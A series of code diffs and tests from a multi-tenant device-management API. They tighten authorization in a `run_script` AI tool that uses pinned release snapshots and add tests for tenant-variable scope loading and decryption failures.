@@ -473,6 +473,7 @@ describe('run_script consumes a verified release snapshot instead of re-querying
     id: SCRIPT_ID,
     orgId: ORG_B,
     partnerId: null,
+    isSystem: false,
     language: 'powershell',
     content: 'echo pinned',
     timeoutSeconds: 60,
@@ -487,7 +488,11 @@ describe('run_script consumes a verified release snapshot instead of re-querying
    * SIBLINGS — the scope must never be reachable from the digest material.
    * Cast because the fixtures are deliberately partial rows.
    */
-  function contextFor(scriptRow: any, scope: any = pinnedScope): ToolExecutionContext {
+  function contextFor(
+    scriptRow: any,
+    scope: any = pinnedScope,
+    deviceOrgIds: string[] = [ORG_B],
+  ): ToolExecutionContext {
     return {
       verifiedRunScript: {
         snapshot: {
@@ -500,7 +505,7 @@ describe('run_script consumes a verified release snapshot instead of re-querying
             runAs: scriptRow.runAs,
           },
           parameterDefinitions: '[]',
-          deviceOrgIds: [ORG_B],
+          deviceOrgIds,
           variableReferences: [],
         },
         scriptRow,
@@ -604,6 +609,59 @@ describe('run_script consumes a verified release snapshot instead of re-querying
     expect(dispatchScriptToDevice).not.toHaveBeenCalled();
     // And it must NOT quietly fall back to the query to try again.
     expect(selectedTables).not.toContain(scripts);
+  });
+
+  // Fix round 1, Finding 1. The skipped query ran inside the CALLER's DB
+  // context, so RLS filtered it as well as the app-layer org condition. The
+  // pinned row is read system-scoped, so RLS is simply absent on this path.
+  // Every row the `scripts` SELECT policy hides is caught by canAccessOrg or by
+  // the per-device partner guard EXCEPT the orphan below, which has no org to
+  // check and no partner to guard — it must be refused explicitly.
+  it('refuses a pinned orphan row (org NULL, partner NULL, not is_system) that RLS would have hidden', async () => {
+    mockDb(null, deviceRow);
+
+    const out = JSON.parse(
+      await runScriptTool().handler(
+        { scriptId: SCRIPT_ID, deviceIds: [DEVICE_B] },
+        makeAuth(),
+        contextFor(pinnedRow({ orgId: null, partnerId: null, isSystem: false })),
+      ),
+    );
+
+    expect(out.error).toMatch(/not found/i);
+    expect(dispatchScriptToDevice).not.toHaveBeenCalled();
+    // No quiet fallback to the query either — the refusal is terminal.
+    expect(selectedTables).not.toContain(scripts);
+  });
+
+  it('still runs a genuine system script (org NULL, partner NULL, is_system) — the refusal is not a blanket null check', async () => {
+    mockDb(null, deviceRow);
+
+    await runScriptTool().handler(
+      { scriptId: SCRIPT_ID, deviceIds: [DEVICE_B] },
+      makeAuth(),
+      contextFor(pinnedRow({ orgId: null, partnerId: null, isSystem: true })),
+    );
+
+    expect(dispatchScriptToDevice).toHaveBeenCalledTimes(1);
+  });
+
+  // Fix round 1, Finding 2. Identity is re-checked on `scriptId`; this is the
+  // same check on the other argument. A context built from different arguments
+  // would hand dispatch a scope that never covered this device's org.
+  it('fails a device the pinned snapshot never covered instead of dispatching against an unrelated scope', async () => {
+    mockDb(null, deviceRow); // device is in ORG_B
+
+    const out = JSON.parse(
+      await runScriptTool().handler(
+        { scriptId: SCRIPT_ID, deviceIds: [DEVICE_B] },
+        makeAuth(),
+        contextFor(pinnedRow({ orgId: null, partnerId: null, isSystem: true }), pinnedScope, [ORG_A]),
+      ),
+    );
+
+    expect(dispatchScriptToDevice).not.toHaveBeenCalled();
+    expect(out.results[DEVICE_B].error).toMatch(/not found or access denied/i);
   });
 
   it('ignores a context pinned to a DIFFERENT script and falls back to the query', async () => {

--- a/apps/api/src/services/aiToolsScripts.ts
+++ b/apps/api/src/services/aiToolsScripts.ts
@@ -182,8 +182,9 @@ function verifiedRunScriptFor(
  *     per-device partner guard — EXCEPT ONE SHAPE:
  *     `(org_id NULL, partner_id NULL, is_system false)`. That orphan is
  *     representable today (`resolveScriptCreateScope`'s system-scope branch
- *     yields `{orgId: null, partnerId: null}` and `insertScriptRow` clamps
- *     `is_system` to false; there is no XOR CHECK on `scripts`), it is
+ *     yields `{orgId: null, partnerId: null}` and `insertScriptRow` DEFAULTS
+ *     `is_system` to false on that branch unless the caller explicitly
+ *     requests it; there is no XOR CHECK on `scripts`), it is
  *     invisible to every non-system caller, and it would sail straight past
  *     layer 1 (org id is null) and past the partner guard (partner id is
  *     null). It is refused below.

--- a/apps/api/src/services/aiToolsScripts.ts
+++ b/apps/api/src/services/aiToolsScripts.ts
@@ -31,6 +31,7 @@ import { eq, and, desc, sql, ilike, isNull, or, SQL } from 'drizzle-orm';
 import type { AuthContext } from '../middleware/auth';
 import { escapeLike } from '../utils/sql';
 import type { AiTool } from './aiTools';
+import type { ToolExecutionContext, VerifiedRunScript } from './toolExecutionContext';
 import { dispatchScriptToDevice } from './scriptDispatch';
 import { loadTenantVariableScope } from './tenantVariableResolution';
 import { captureException } from './sentry';
@@ -94,6 +95,61 @@ async function verifyDeviceAccess(
   }
   if (requireOnline && device.status !== 'online') return { error: `Device ${device.hostname} is not online (status: ${device.status})` };
   return { device };
+}
+
+/**
+ * The `run_script` script lookup, unchanged from the pre-#3409-PR4c-1 inline
+ * version — extracted only so the handler can choose between it and a verified
+ * release's already-resolved row without nesting the query in a conditional.
+ */
+async function queryRunScriptRow(
+  scriptId: string,
+  auth: AuthContext,
+): Promise<typeof scripts.$inferSelect | undefined> {
+  const scriptConditions: SQL[] = [eq(scripts.id, scriptId), isNull(scripts.deletedAt)];
+  // Partner-wide scripts have org_id NULL; the plain orgCondition would
+  // exclude them even though RLS makes them visible to this session.
+  // Defense-in-depth stays: org-owned scripts must satisfy orgCondition,
+  // org-less rows pass here and are constrained per-device below.
+  const orgCond = auth.orgCondition(scripts.orgId);
+  if (orgCond) scriptConditions.push(or(isNull(scripts.orgId), orgCond)!);
+
+  const [script] = await db
+    .select()
+    .from(scripts)
+    .where(and(...scriptConditions))
+    .limit(1);
+  return script;
+}
+
+/**
+ * The verified release material for THIS call, or `undefined` — in which case
+ * `run_script` behaves exactly as it always has (direct chat, MCP and the
+ * script builder never supply a context).
+ *
+ * The pinned row's id is re-checked against the requested `scriptId` because
+ * the context and the arguments arrive on different channels: the release
+ * paths compute both from the same `action_intents.arguments`, so a
+ * disagreement can only mean a plumbing bug, and executing SOMEONE ELSE'S
+ * verified script would be the worst possible response to one. Falling back to
+ * the ordinary query keeps the call correct; the log + Sentry capture keep the
+ * bug from being invisible (a silent fallback would look exactly like the
+ * feature never shipping).
+ */
+function verifiedRunScriptFor(
+  context: ToolExecutionContext | undefined,
+  scriptIdArg: unknown,
+): VerifiedRunScript | undefined {
+  const verified = context?.verifiedRunScript;
+  if (!verified) return undefined;
+  if (verified.scriptRow.id !== scriptIdArg) {
+    const message =
+      '[aiToolsScripts] run_script verified snapshot does not match the requested scriptId; re-querying';
+    console.error(message, { requested: scriptIdArg, verified: verified.scriptRow.id });
+    captureException(new Error(message));
+    return undefined;
+  }
+  return verified;
 }
 
 export function registerScriptTools(aiTools: Map<string, AiTool>): void {
@@ -169,25 +225,32 @@ export function registerScriptTools(aiTools: Map<string, AiTool>): void {
         required: ['scriptId', 'deviceIds']
       }
     },
-    handler: async (input, auth) => {
+    handler: async (input, auth, context) => {
       const { waitForCommandResult } = await getCommandQueue();
       const deviceIds = input.deviceIds as string[];
       const results: Record<string, unknown> = {};
 
-      // Resolve script content upfront so the agent receives the full payload
-      const scriptConditions: SQL[] = [eq(scripts.id, input.scriptId as string), isNull(scripts.deletedAt)];
-      // Partner-wide scripts have org_id NULL; the plain orgCondition would
-      // exclude them even though RLS makes them visible to this session.
-      // Defense-in-depth stays: org-owned scripts must satisfy orgCondition,
-      // org-less rows pass here and are constrained per-device below.
-      const orgCond = auth.orgCondition(scripts.orgId);
-      if (orgCond) scriptConditions.push(or(isNull(scripts.orgId), orgCond)!);
+      // #3409 PR4c-1 — a release path may have ALREADY read this script row and
+      // resolved its tenant variables, in order to recompute the approval's
+      // pinned effect digest. Reading them again here would reopen the exact
+      // check/use window the digest exists to close: the digest proves the
+      // target was unchanged as of THAT read, and a second read proves nothing.
+      const verified = verifiedRunScriptFor(context, input.scriptId);
 
-      const [script] = await db
-        .select()
-        .from(scripts)
-        .where(and(...scriptConditions))
-        .limit(1);
+      // AUTHORIZATION, NOT CACHING. The query the verified branch skips carried
+      // `or(isNull(orgId), auth.orgCondition(orgId))`, and the release path
+      // resolved its row under a SYSTEM context with no org filter at all.
+      // `canAccessOrg` is that same filter expressed in code (both derive from
+      // `accessibleOrgIds` — middleware/auth.ts's buildOrgAccessClosures), so an
+      // org the caller cannot reach is refused here exactly as the query would
+      // have returned no row. The digest verifies CONTENT IDENTITY; it says
+      // nothing about this caller's authority.
+      if (verified && verified.scriptRow.orgId !== null && !auth.canAccessOrg(verified.scriptRow.orgId)) {
+        return JSON.stringify({ error: 'Script not found or has no content' });
+      }
+
+      // Resolve script content upfront so the agent receives the full payload
+      const script = verified ? verified.scriptRow : await queryRunScriptRow(input.scriptId as string, auth);
 
       if (!script || !script.content) {
         return JSON.stringify({ error: 'Script not found or has no content' });
@@ -297,9 +360,18 @@ export function registerScriptTools(aiTools: Map<string, AiTool>): void {
               // content tokens alone — a `tenantVariable`-bound parameter
               // lives in `scripts.parameters`, and a content-only gate would
               // hand dispatch an empty scope for it.
-              const variableScope = await loadTenantVariableScope(
-                scriptNeedsVariableScope(script) ? [access.device.orgId] : []
-              );
+              //
+              // #3409 PR4c-1: with a verified release, the scope is the one
+              // the digest's variable references were pinned from — reusing
+              // it is the point of the whole exercise. It was loaded through
+              // the SAME gate over the SAME row, for every device org in the
+              // call, so it is a superset of what this per-device load would
+              // have produced (and equally empty when the script needs none).
+              const variableScope = verified
+                ? verified.scope
+                : await loadTenantVariableScope(
+                    scriptNeedsVariableScope(script) ? [access.device.orgId] : []
+                  );
               return dispatchScriptToDevice({
                 device: access.device,
                 source: { kind: 'saved', script },

--- a/apps/api/src/services/aiToolsScripts.ts
+++ b/apps/api/src/services/aiToolsScripts.ts
@@ -152,6 +152,58 @@ function verifiedRunScriptFor(
   return verified;
 }
 
+/**
+ * Whether `auth` may run a script row that a RELEASE path resolved under a
+ * SYSTEM DB context (#3409 PR4c-1 fix round 1).
+ *
+ * The query this replaces was protected TWICE, and skipping it drops BOTH
+ * layers, so both have to be re-expressed here:
+ *
+ *  1. APP LAYER — `or(isNull(orgId), auth.orgCondition(orgId))`.
+ *     `canAccessOrg` and `orgCondition` are built by the same
+ *     `buildOrgAccessClosures` from the same `accessibleOrgIds`
+ *     (middleware/auth.ts), so the check below is that filter exactly:
+ *     unrestricted for `accessibleOrgIds === null`, membership otherwise, and
+ *     an org-less row passes (it is constrained per-device by the partner
+ *     guard in the handler).
+ *
+ *  2. RLS — the query ran inside the CALLER's context
+ *     (`withAuthDbAccessContext` on the durable worker, `withDbAccessContext`
+ *     inline), so Postgres filtered it too. The pinned row is read
+ *     system-scoped, so that layer is simply gone. The `scripts` SELECT policy
+ *     (migration `2026-06-13-catalog-partner-read-branch.sql`) is:
+ *
+ *       breeze_has_org_access(org_id)
+ *       OR breeze_has_partner_access(partner_id)
+ *       OR is_system                       -- the COLUMN, not a session flag
+ *       OR (org_id IS NULL AND partner_id = breeze_current_partner_id())
+ *
+ *     Every row that policy hides is already refused by layer 1 or by the
+ *     per-device partner guard — EXCEPT ONE SHAPE:
+ *     `(org_id NULL, partner_id NULL, is_system false)`. That orphan is
+ *     representable today (`resolveScriptCreateScope`'s system-scope branch
+ *     yields `{orgId: null, partnerId: null}` and `insertScriptRow` clamps
+ *     `is_system` to false; there is no XOR CHECK on `scripts`), it is
+ *     invisible to every non-system caller, and it would sail straight past
+ *     layer 1 (org id is null) and past the partner guard (partner id is
+ *     null). It is refused below.
+ *
+ * THE NULL CHECK IS NOT REDUNDANT — deleting it re-opens exactly the RLS
+ * clause the system-scoped read skipped. It is also deliberately
+ * unconditional: `breeze_has_org_access(NULL)` is TRUE for a system-scope
+ * SESSION, so this is marginally stricter than RLS for a system-scope token
+ * (the membership-less caller the handler's own comment warns about) — the
+ * orphan shape is a data bug, and refusing to execute one through an approved
+ * intent is the right direction to be wrong in.
+ */
+function callerMayUseVerifiedScript(
+  script: typeof scripts.$inferSelect,
+  auth: AuthContext,
+): boolean {
+  if (script.orgId !== null) return auth.canAccessOrg(script.orgId);
+  return script.partnerId !== null || script.isSystem;
+}
+
 export function registerScriptTools(aiTools: Map<string, AiTool>): void {
   function registerTool(tool: AiTool): void {
     aiTools.set(tool.definition.name, tool);
@@ -237,15 +289,12 @@ export function registerScriptTools(aiTools: Map<string, AiTool>): void {
       // target was unchanged as of THAT read, and a second read proves nothing.
       const verified = verifiedRunScriptFor(context, input.scriptId);
 
-      // AUTHORIZATION, NOT CACHING. The query the verified branch skips carried
-      // `or(isNull(orgId), auth.orgCondition(orgId))`, and the release path
-      // resolved its row under a SYSTEM context with no org filter at all.
-      // `canAccessOrg` is that same filter expressed in code (both derive from
-      // `accessibleOrgIds` — middleware/auth.ts's buildOrgAccessClosures), so an
-      // org the caller cannot reach is refused here exactly as the query would
-      // have returned no row. The digest verifies CONTENT IDENTITY; it says
-      // nothing about this caller's authority.
-      if (verified && verified.scriptRow.orgId !== null && !auth.canAccessOrg(verified.scriptRow.orgId)) {
+      // AUTHORIZATION, NOT CACHING. The skipped query was filtered by BOTH its
+      // app-layer org condition AND by RLS (it ran in the caller's own DB
+      // context); the pinned row is read system-scoped, so both layers are
+      // re-expressed in `callerMayUseVerifiedScript`. The digest verifies
+      // CONTENT IDENTITY; it says nothing about this caller's authority.
+      if (verified && !callerMayUseVerifiedScript(verified.scriptRow, auth)) {
         return JSON.stringify({ error: 'Script not found or has no content' });
       }
 
@@ -276,6 +325,26 @@ export function registerScriptTools(aiTools: Map<string, AiTool>): void {
           const access = await verifyDeviceAccess(deviceId, auth);
           if ('error' in access) {
             results[deviceId] = { error: access.error };
+            continue;
+          }
+
+          // Identity hardening for the verified path (#3409 PR4c-1 fix round
+          // 1). `verifiedRunScriptFor` re-checks the pinned scriptId; this is
+          // the same check on the OTHER argument. The snapshot's
+          // `deviceOrgIds` is built from every id in `args.deviceIds`, and
+          // this loop dispatches a subset of that same array, so the device's
+          // org is always a member when the context and the arguments came
+          // from the same intent. If it is not, the pinned SCOPE may not cover
+          // this device's org — dispatch would resolve its tenant variables
+          // against a scope that was never loaded for it and quietly render
+          // "no value set". Fail this device closed rather than dispatch on
+          // unverified material; log + capture so the plumbing bug is visible.
+          if (verified && !verified.snapshot.deviceOrgIds.includes(access.device.orgId)) {
+            const message =
+              '[aiToolsScripts] run_script verified snapshot does not cover the dispatched device org';
+            console.error(message, { deviceId, deviceOrgId: access.device.orgId });
+            captureException(new Error(message));
+            results[deviceId] = { error: 'Device not found or access denied' };
             continue;
           }
 

--- a/apps/api/src/services/tenantVariableResolution.test.ts
+++ b/apps/api/src/services/tenantVariableResolution.test.ts
@@ -7,16 +7,21 @@ import { beforeEach, describe, expect, it, vi } from 'vitest';
 // plain strings would make those assertions vacuous (see
 // services/tenantVariables.test.ts, whose `boundParams` helper this file
 // copies for the same reason).
+// runOutsideDbContext / withSystemDbAccessContext are mocked as flag-tracking
+// passthroughs (vi.fn() wrapping the real behaviour), not bare identity
+// functions, specifically so Task 3b's "database supplied -> escape hatch
+// NOT invoked" tests can assert on call counts rather than merely on side
+// effects. Same pattern as aiToolsScripts.runScript.orgEquality.test.ts.
 vi.mock('../db', () => {
   const dbMock = { select: vi.fn() };
   return {
     db: dbMock,
-    runOutsideDbContext: <T>(fn: () => T): T => fn(),
-    withSystemDbAccessContext: async <T>(fn: () => Promise<T>): Promise<T> => fn()
+    runOutsideDbContext: vi.fn(<T,>(fn: () => T): T => fn()),
+    withSystemDbAccessContext: vi.fn(async <T,>(fn: () => Promise<T>): Promise<T> => fn())
   };
 });
 
-import { db } from '../db';
+import { db, runOutsideDbContext, withSystemDbAccessContext, type Database } from '../db';
 import { encryptTenantVariableValue } from './tenantVariables';
 import {
   describeVariableFailure,
@@ -28,6 +33,8 @@ import {
 } from './tenantVariableResolution';
 
 const dbMock = db as unknown as { select: ReturnType<typeof vi.fn> };
+const runOutsideDbContextMock = runOutsideDbContext as unknown as ReturnType<typeof vi.fn>;
+const withSystemDbAccessContextMock = withSystemDbAccessContext as unknown as ReturnType<typeof vi.fn>;
 
 const ORG_A = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa';
 const ORG_B = 'bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb';
@@ -99,9 +106,9 @@ function encryptedRow(id: string, plaintext: string, overrides: Partial<StubRow>
 }
 
 /** Chainable select stub matching `.select().from().innerJoin().where()`. */
-function stubSelect(rows: StubRow[]) {
+function stubSelectOn(select: ReturnType<typeof vi.fn>, rows: StubRow[]) {
   const captured: { on?: unknown; where?: unknown } = {};
-  dbMock.select.mockReturnValue({
+  select.mockReturnValue({
     from: () => ({
       innerJoin: (_table: unknown, on: unknown) => {
         captured.on = on;
@@ -115,6 +122,10 @@ function stubSelect(rows: StubRow[]) {
     })
   });
   return captured;
+}
+
+function stubSelect(rows: StubRow[]) {
+  return stubSelectOn(dbMock.select, rows);
 }
 
 function mapWith(entry: Partial<ResolvedVariable> & { key: string }): Map<string, ResolvedVariable> {
@@ -295,6 +306,58 @@ describe('loadTenantVariableScope', () => {
     expect(resolved.get('k')?.value).not.toBe('partner-value');
     expect(unreadableForOrg(scope, ORG_A).has('k')).toBe(true);
     warn.mockRestore();
+  });
+});
+
+// Task 3b (#3409 PR4c-1): the digest path computes inside an
+// already-open, already-system-scoped transaction (intentService.ts:385-408)
+// and must reuse THAT connection rather than acquiring a second pooled one
+// via the escape hatch — see tenantVariableResolution.ts's doc comment on
+// `opts.database` for the caller contract this enforces.
+describe('loadTenantVariableScope given an explicit database', () => {
+  it('queries the supplied database directly and does NOT call the escape helpers', async () => {
+    const suppliedSelect = vi.fn();
+    stubSelectOn(suppliedSelect, []);
+    const suppliedDb = { select: suppliedSelect } as unknown as Database;
+
+    const scope = await loadTenantVariableScope([ORG_A], { database: suppliedDb });
+
+    expect(scope.orgIds.has(ORG_A)).toBe(true);
+    expect(suppliedSelect).toHaveBeenCalledTimes(1);
+    // The module-level `db` (today's ambient escape target) must be
+    // untouched — the query ran on the supplied connection, not a second one.
+    expect(dbMock.select).not.toHaveBeenCalled();
+    expect(runOutsideDbContextMock).not.toHaveBeenCalled();
+    expect(withSystemDbAccessContextMock).not.toHaveBeenCalled();
+  });
+
+  it('still returns an empty scope without querying ANYTHING for an empty input, database or not', async () => {
+    const suppliedSelect = vi.fn();
+    const suppliedDb = { select: suppliedSelect } as unknown as Database;
+
+    const scope = await loadTenantVariableScope([], { database: suppliedDb });
+
+    expect(scope.orgIds.size).toBe(0);
+    expect(suppliedSelect).not.toHaveBeenCalled();
+    expect(dbMock.select).not.toHaveBeenCalled();
+    expect(runOutsideDbContextMock).not.toHaveBeenCalled();
+    expect(withSystemDbAccessContextMock).not.toHaveBeenCalled();
+  });
+});
+
+// Byte-for-byte-unaffected proof for the five existing callers (Step 3 of
+// Task 3b): omitting `opts` — exactly what all five call sites do — must
+// still ride the escape hatch, on the module's own `db`, exactly as before
+// this task.
+describe('loadTenantVariableScope with no explicit database (today\'s five callers)', () => {
+  it('escapes via runOutsideDbContext + withSystemDbAccessContext and queries the module-level db', async () => {
+    stubSelect([]);
+
+    await loadTenantVariableScope([ORG_A]);
+
+    expect(runOutsideDbContextMock).toHaveBeenCalledTimes(1);
+    expect(withSystemDbAccessContextMock).toHaveBeenCalledTimes(1);
+    expect(dbMock.select).toHaveBeenCalledTimes(1);
   });
 });
 

--- a/apps/api/src/services/tenantVariableResolution.test.ts
+++ b/apps/api/src/services/tenantVariableResolution.test.ts
@@ -12,16 +12,26 @@ import { beforeEach, describe, expect, it, vi } from 'vitest';
 // functions, specifically so Task 3b's "database supplied -> escape hatch
 // NOT invoked" tests can assert on call counts rather than merely on side
 // effects. Same pattern as aiToolsScripts.runScript.orgEquality.test.ts.
+// getCurrentDbAccessContext backs the `opts.database` system-scope assertion;
+// it defaults to the system context the real callers hold, and the assertion
+// test below overrides it per-case.
 vi.mock('../db', () => {
   const dbMock = { select: vi.fn() };
   return {
     db: dbMock,
+    getCurrentDbAccessContext: vi.fn(() => ({ scope: 'system' })),
     runOutsideDbContext: vi.fn(<T,>(fn: () => T): T => fn()),
     withSystemDbAccessContext: vi.fn(async <T,>(fn: () => Promise<T>): Promise<T> => fn())
   };
 });
 
-import { db, runOutsideDbContext, withSystemDbAccessContext, type Database } from '../db';
+import {
+  db,
+  getCurrentDbAccessContext,
+  runOutsideDbContext,
+  withSystemDbAccessContext,
+  type Database
+} from '../db';
 import { encryptTenantVariableValue } from './tenantVariables';
 import {
   describeVariableFailure,
@@ -35,6 +45,7 @@ import {
 const dbMock = db as unknown as { select: ReturnType<typeof vi.fn> };
 const runOutsideDbContextMock = runOutsideDbContext as unknown as ReturnType<typeof vi.fn>;
 const withSystemDbAccessContextMock = withSystemDbAccessContext as unknown as ReturnType<typeof vi.fn>;
+const getCurrentDbAccessContextMock = getCurrentDbAccessContext as unknown as ReturnType<typeof vi.fn>;
 
 const ORG_A = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa';
 const ORG_B = 'bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb';
@@ -342,6 +353,29 @@ describe('loadTenantVariableScope given an explicit database', () => {
     expect(dbMock.select).not.toHaveBeenCalled();
     expect(runOutsideDbContextMock).not.toHaveBeenCalled();
     expect(withSystemDbAccessContextMock).not.toHaveBeenCalled();
+  });
+
+  // `opts.database` is a caller ASSERTION that a system context is already
+  // open, and nothing but this check enforces it. A false assertion never
+  // errors on its own: the query just runs under the caller's RLS, which can
+  // NARROW the result set silently — for the effect-digest callers that means
+  // a recomputed digest that no longer matches the pinned one and
+  // `content_changed` on every approved release.
+  it.each([
+    ['an org-scoped context', { scope: 'organization' }],
+    ['a partner-scoped context', { scope: 'partner' }],
+    ['no context at all', undefined]
+  ])('refuses the supplied database under %s', async (_case, ambient) => {
+    getCurrentDbAccessContextMock.mockReturnValueOnce(ambient);
+    const suppliedSelect = vi.fn();
+    stubSelectOn(suppliedSelect, []);
+    const suppliedDb = { select: suppliedSelect } as unknown as Database;
+
+    await expect(loadTenantVariableScope([ORG_A], { database: suppliedDb })).rejects.toThrow(
+      /requires an already-open system-scoped DB context/i
+    );
+    // Fails BEFORE the query — an RLS-narrowed row set never reaches a snapshot.
+    expect(suppliedSelect).not.toHaveBeenCalled();
   });
 });
 

--- a/apps/api/src/services/tenantVariableResolution.test.ts
+++ b/apps/api/src/services/tenantVariableResolution.test.ts
@@ -23,6 +23,7 @@ import {
   loadTenantVariableScope,
   resolveForOrg,
   substituteTenantVariables,
+  unreadableForOrg,
   type ResolvedVariable
 } from './tenantVariableResolution';
 
@@ -213,6 +214,72 @@ describe('loadTenantVariableScope', () => {
     const scope = await loadTenantVariableScope([ORG_A]);
     const resolved = resolveForOrg(scope, ORG_A);
     expect(resolved.get('s1_token')).toMatchObject({ isSecret: true, value: 'shh' });
+  });
+
+  it('an undecryptable row is reported as unreadable, not merely absent — and is still never given a value', async () => {
+    const warn = vi.spyOn(console, 'warn').mockImplementation(() => {});
+    stubSelect([
+      { id: ROW_BAD, key: 'broken', value: 'enc:v3:unit:not.real.ciphertext', isSecret: false, version: 1, ownerOrgId: ORG_A, forOrgId: ORG_A }
+    ]);
+    const scope = await loadTenantVariableScope([ORG_A]);
+    const resolved = resolveForOrg(scope, ORG_A);
+    // Never resolves to a value — no placeholder, no empty string.
+    expect(resolved.has('broken')).toBe(false);
+    // But it must be distinguishable from a key that was never defined at all.
+    expect(unreadableForOrg(scope, ORG_A).has('broken')).toBe(true);
+    warn.mockRestore();
+  });
+
+  it('a key that was never defined is absent from BOTH the resolved map and the unreadable set', async () => {
+    stubSelect([]);
+    const scope = await loadTenantVariableScope([ORG_A]);
+    const resolved = resolveForOrg(scope, ORG_A);
+    expect(resolved.has('never_defined')).toBe(false);
+    expect(unreadableForOrg(scope, ORG_A).has('never_defined')).toBe(false);
+  });
+
+  // The subtle precedence case: an org-owned row for key `k` fails to
+  // decrypt, and a readable partner-wide row for the SAME key `k` also
+  // exists. The org row won the precedence contest (org > partner, see the
+  // two-pass loop above), so `k` must be UNREADABLE for this org — it must
+  // NOT silently fall back to the partner-wide value, which would substitute
+  // a different tenant scope's material into a script. Before this task,
+  // `orgOwnedKeys` was only populated on a *successful* decrypt, so an
+  // unreadable org row left the key unclaimed and the partner-wide pass
+  // resolved right over it with the wrong tenant's value.
+  it('an unreadable org row shadows a readable partner row — it must NOT fall back to the partner value', async () => {
+    const warn = vi.spyOn(console, 'warn').mockImplementation(() => {});
+    stubSelect([
+      encryptedRow(ROW_PARTNER, 'partner-value', { key: 'k', ownerOrgId: null, forOrgId: ORG_A }),
+      { id: ROW_BAD, key: 'k', value: 'enc:v3:unit:not.real.ciphertext', isSecret: false, version: 1, ownerOrgId: ORG_A, forOrgId: ORG_A }
+    ]);
+    const scope = await loadTenantVariableScope([ORG_A]);
+    const resolved = resolveForOrg(scope, ORG_A);
+    expect(resolved.has('k')).toBe(false);
+    expect(resolved.get('k')?.value).not.toBe('partner-value');
+    expect(unreadableForOrg(scope, ORG_A).has('k')).toBe(true);
+    warn.mockRestore();
+  });
+});
+
+describe('unreadableForOrg', () => {
+  it('throws when asked to resolve for an org the snapshot was not built for', async () => {
+    stubSelect([]);
+    const scope = await loadTenantVariableScope([ORG_A]);
+    expect(() => unreadableForOrg(scope, ORG_B)).toThrow(/not in this snapshot/i);
+  });
+
+  it('returns a fresh set each call — mutating the result cannot corrupt the snapshot', async () => {
+    const warn = vi.spyOn(console, 'warn').mockImplementation(() => {});
+    stubSelect([
+      { id: ROW_BAD, key: 'broken', value: 'enc:v3:unit:not.real.ciphertext', isSecret: false, version: 1, ownerOrgId: ORG_A, forOrgId: ORG_A }
+    ]);
+    const scope = await loadTenantVariableScope([ORG_A]);
+    const first = unreadableForOrg(scope, ORG_A);
+    (first as Set<string>).delete('broken');
+    const second = unreadableForOrg(scope, ORG_A);
+    expect(second.has('broken')).toBe(true);
+    warn.mockRestore();
   });
 });
 

--- a/apps/api/src/services/tenantVariableResolution.test.ts
+++ b/apps/api/src/services/tenantVariableResolution.test.ts
@@ -230,23 +230,59 @@ describe('loadTenantVariableScope', () => {
     warn.mockRestore();
   });
 
-  it('a key that was never defined is absent from BOTH the resolved map and the unreadable set', async () => {
-    stubSelect([]);
+  // A bare empty-rows stub would pass against ANY implementation that
+  // returns empty collections (including a stub that never populates
+  // `unreadableKeysByOrg` at all) — not discriminating. Mix in one readable
+  // and one unreadable key so "never defined" is asserted against a
+  // populated snapshot, proving the never-defined key is excluded from both
+  // collections rather than both collections simply being empty.
+  it('a key that was never defined is absent from BOTH the resolved map and the unreadable set, alongside other readable/unreadable keys', async () => {
+    const warn = vi.spyOn(console, 'warn').mockImplementation(() => {});
+    stubSelect([
+      encryptedRow(ROW_ORG, 'v', { key: 'defined_readable', ownerOrgId: ORG_A, forOrgId: ORG_A }),
+      { id: ROW_BAD, key: 'defined_unreadable', value: 'enc:v3:unit:not.real.ciphertext', isSecret: false, version: 1, ownerOrgId: ORG_A, forOrgId: ORG_A }
+    ]);
     const scope = await loadTenantVariableScope([ORG_A]);
     const resolved = resolveForOrg(scope, ORG_A);
+    const unreadable = unreadableForOrg(scope, ORG_A);
+    // Sanity: the mixed snapshot actually populated both collections.
+    expect(resolved.has('defined_readable')).toBe(true);
+    expect(unreadable.has('defined_unreadable')).toBe(true);
+    // The never-defined key is in neither.
     expect(resolved.has('never_defined')).toBe(false);
-    expect(unreadableForOrg(scope, ORG_A).has('never_defined')).toBe(false);
+    expect(unreadable.has('never_defined')).toBe(false);
+    warn.mockRestore();
+  });
+
+  // An unreadable row in the PARTNER-WIDE pass (not just the org-owned pass
+  // above) must also be reported as unreadable, never as absent. This is the
+  // likelier real case for an MSP-defined default that fails to decrypt (no
+  // org override involved at all) — and it exercises a different code path
+  // (the second loop in loadTenantVariableScope) than the org-owned case
+  // above, so it needs its own coverage rather than being assumed from it.
+  it('an unreadable partner-wide row (no org override) is reported as unreadable, not absent', async () => {
+    const warn = vi.spyOn(console, 'warn').mockImplementation(() => {});
+    stubSelect([
+      { id: ROW_BAD, key: 'broken_default', value: 'enc:v3:unit:not.real.ciphertext', isSecret: false, version: 1, ownerOrgId: null, forOrgId: ORG_A }
+    ]);
+    const scope = await loadTenantVariableScope([ORG_A]);
+    const resolved = resolveForOrg(scope, ORG_A);
+    expect(resolved.has('broken_default')).toBe(false);
+    expect(unreadableForOrg(scope, ORG_A).has('broken_default')).toBe(true);
+    warn.mockRestore();
   });
 
   // The subtle precedence case: an org-owned row for key `k` fails to
   // decrypt, and a readable partner-wide row for the SAME key `k` also
   // exists. The org row won the precedence contest (org > partner, see the
   // two-pass loop above), so `k` must be UNREADABLE for this org — it must
-  // NOT silently fall back to the partner-wide value, which would substitute
-  // a different tenant scope's material into a script. Before this task,
-  // `orgOwnedKeys` was only populated on a *successful* decrypt, so an
-  // unreadable org row left the key unclaimed and the partner-wide pass
-  // resolved right over it with the wrong tenant's value.
+  // NOT silently fall back to the partner-wide value. That value is this
+  // org's own DEFAULT (not another tenant's data — the join and every write
+  // are keyed by `forOrgId`), and falling back to it would mean the default
+  // silently wins over the override that was meant to replace it. Before
+  // this task, `orgOwnedKeys` was only populated on a *successful* decrypt,
+  // so an unreadable org row left the key unclaimed and the partner-wide
+  // pass resolved right over it with the default's value.
   it('an unreadable org row shadows a readable partner row — it must NOT fall back to the partner value', async () => {
     const warn = vi.spyOn(console, 'warn').mockImplementation(() => {});
     stubSelect([

--- a/apps/api/src/services/tenantVariableResolution.ts
+++ b/apps/api/src/services/tenantVariableResolution.ts
@@ -60,13 +60,22 @@ export interface TenantVariableScope {
   readonly orgIds: ReadonlySet<string>;
 }
 
